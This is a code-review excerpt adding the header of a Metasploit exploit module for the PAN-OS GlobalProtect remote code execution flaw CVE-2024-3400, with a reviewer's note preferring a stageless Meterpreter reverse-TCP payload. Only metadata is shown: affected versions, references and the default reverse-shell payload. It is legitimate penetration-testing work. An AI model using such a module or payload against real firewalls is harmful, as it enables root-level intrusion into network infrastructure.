modules/exploits/linux/http/panos_telemetry_cmd_exec.rb

```diff
@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution',
+        'Description' => %q{
+          This module exploits a vulnerability in Palo Alto Networks PAN-OS that
+          allows an unauthenticated attacker to create arbitrarily named files and execute
+          shell commands. Configuration requirements are PAN-OS with GlobalProtect Gateway or
+          GlobalProtect Portal enabled and telemetry collection on (default). Affected versions
+          include < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1,
+          < 10.2.5-h6, < 10.2.6-h3, < 10.2.8-h3, and < 10.2.9-h1.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'remmons-r7', # Metasploit module
+          'sfewer-r7' # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2024-3400'],
+          ['URL', 'https://security.paloaltonetworks.com/CVE-2024-3400'], # Vendor Advisory
+          ['URL', 'https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/'] # Initial Volexity report of the 0day exploitation
+        ],
+        'DisclosureDate' => '2024-04-12',
+        'Platform' => 'linux',
+        'Arch' => [ARCH_X64],
+        'Privileged' => true, # Executes as root on Linux
+        'Targets' => [ [ 'Default', {} ] ],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',
```

Comment:
```suggestion
          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
```
No sense in uploading a staged payload when you can upload the whole payload all at once.
I'll keep being annoying about this......

Reply:
Great suggestion, thank you!